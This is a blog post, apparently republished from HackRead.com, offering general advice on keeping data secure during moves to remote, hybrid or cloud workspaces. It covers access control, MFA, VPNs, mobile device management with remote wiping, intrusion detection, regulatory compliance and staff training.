Data security is vital for protecting sensitive information and maintaining trust.
This is a post from HackRead.com Read the original post: Elevating Data Security: Key Considerations When Transferring Your Digital Workspace

In today’s dynamic digital landscape, data security has emerged as a paramount concern. The surge in workspace transitions, encompassing remote work, hybrid models, and flexible office setups, necessitates a meticulous approach to safeguarding sensitive information.

This article delves into the imperative task of upholding data security during workspace transitions, elucidating key measures, legal considerations, and proactive strategies to ensure the integrity of valuable data.

**Understanding Workspace Transitions and Data Vulnerabilities**

Workspace transitions, propelled by evolving work dynamics, demand a comprehensive understanding of potential data vulnerabilities. The shift towards remote work, hybrid setups and the reliance on cloud storage can expose organizations to various security challenges.

These include the use of unsecured networks, the integration of personal devices, and an augmented risk of physical security breaches. Recognizing these vulnerabilities is pivotal in devising effective data security strategies across your organization. 

This is why a good cloud migration plan is of the utmost importance when transferring to a digital workplace. 

**Key Data Security Measures During Workspace Transitions**

Implementing robust access control is a cornerstone of data security during workspace transitions. By employing role-based access mechanisms, organizations can restrict data access based on specific job functions, minimizing the risk of unauthorized information exposure.

Multi-factor authentication (MFA) and biometric verification provide an added layer of defence, fortifying data access against breaches. Additionally, the adoption of encryption protocols for data at rest and in transit ensures that even if data is intercepted, it remains unintelligible to unauthorized entities.

**Establishing Secure Network Infrastructure**

The establishment of a secure network infrastructure is imperative to uphold data security. Virtual Private Networks (VPNs) prove instrumental in encrypting remote connections, thwarting potential eavesdropping attempts and employing network segmentation further fortifying the system by containing potential breaches within isolated segments.

**Data Handling Best Practices**

Data handling practices during workspace transitions should be underscored by stringent best practices. Equipping employees with the knowledge and tools to handle data securely, particularly in remote and hybrid scenarios, is pivotal.

Secure file sharing and collaboration tools must be utilized, enabling seamless interaction while ensuring data protection. Implementing data classification and labelling empowers organizations to prioritize data safeguarding based on sensitivity levels, diminishing the likelihood of inadvertent breaches.

**Endpoint Security and Device Management**

Endpoint security and device management play a pivotal role in data protection. In scenarios involving Bring Your Own Device (BYOD), stringent policies should be instituted to ensure devices meet security requirements.

**Device management**

Mobile Device Management (MDM) solutions play a critical role in today’s digital landscape by providing organizations with the tools they need to manage and secure the wide array of mobile devices that connect to their networks. These solutions enable centralized control over devices, allowing administrators to remotely manage, monitor, and safeguard devices, thereby enhancing security and reducing potential risks.

One of the key features of MDM solutions is their ability to facilitate remote wiping and disabling of lost or stolen devices. This capability serves as a powerful countermeasure against data breaches that could result from unauthorized access to sensitive information stored on these devices. Here’s how MDM solutions accomplish this and why it’s essential:

*   **Centralized Control**: MDM solutions provide a centralized dashboard or console that administrators can use to manage all the enrolled mobile devices. This centralized approach streamlines the management process and ensures consistent security policies across the organization’s mobile device fleet.

*   **Remote Wiping**: In the unfortunate event that a device is lost or stolen, MDM solutions empower administrators to remotely initiate a complete wipe of the device’s data. This action erases all data on the device, returning it to its factory settings. Remote wiping is crucial in preventing unauthorized access to sensitive corporate data, customer information, and proprietary resources.

*   **Disabling Devices**: MDM solutions allow administrators to remotely disable devices, rendering them unusable. This feature can be particularly useful when there’s a high risk of unauthorized access, or if a device has been lost in an area where retrieval is not feasible. By disabling a device, organizations can mitigate the potential damage that could arise from compromised devices falling into the wrong hands.

*   **Data Protection**: MDM solutions often include features like encryption and secure containers. Encryption ensures that data stored on the device is protected even if the physical device is compromised. Secure containers segregate corporate data from personal data, allowing organizations to secure sensitive information without encroaching on users’ personal privacy.

**Monitoring and Incident Response**

Vigilant monitoring and incident response mechanisms are indispensable in the realm of data security. Continuously monitoring network traffic and user activities allows for the timely identification of anomalous behaviour.

Intrusion detection systems (IDS) and intrusion prevention systems (IPS) act as sentinels, mitigating potential threats. Coupled with a meticulously devised incident response plan, organizations can swiftly contain breaches, minimizing damage and ensuring regulatory compliance.

**Legal and Compliance Considerations**

Akin to an intricately woven tapestry, legal and compliance considerations interlace with data security during workspace transitions.

Navigating the labyrinth of data protection regulations such as GDPR, HIPAA, and CCPA is imperative. Organizations must navigate these regulations adeptly, particularly in the context of international data transfers, to ensure seamless transitions without violating regulatory norms.

**Employee Education and Awareness**

A resilient data security strategy is incomplete without a robust focus on employee education and awareness.

Ensuring that every member of the organization comprehends the significance of data security is paramount. You need regular workshops and awareness programs to cultivate a culture of security consciousness, fostering a vigilant workforce that actively contributes to data protection.

**Case Studies: Data Security Success Stories**

Drawing inspiration from real-world scenarios, a compilation of case studies serves as a testament to effective data security during workspace transitions.

These success stories underscore the relevance of meticulous planning, technological integration, and strategic execution. By analyzing these case studies, organizations can distil valuable insights and replicate these strategies to ensure data integrity in their unique contexts.

**Future Trends in Data Security and Workspaces**

Peering into the horizon of data security and workspaces unveils a landscape marked by future trends. Emerging technologies like AI and blockchain are poised to transform workspace security dynamics.

Yet, these advancements come with their own set of challenges, demanding the constant evolution of cybersecurity practices. The role of cybersecurity professionals will be pivotal in embracing and adapting to these changes, ensuring data security remains robust in the face of evolving work paradigms.

**Conclusion**

The modern era demands a steadfast commitment to data security during workspace transitions. As work dynamics continue to evolve, organizations must fortify their data protection measures to navigate the intricate labyrinth of digital landscapes. By embracing robust access controls, secure network infrastructures, vigilant monitoring, and comprehensive employee education, enterprises can elevate data security, ensuring the sanctity of their invaluable information.

Tag

#ios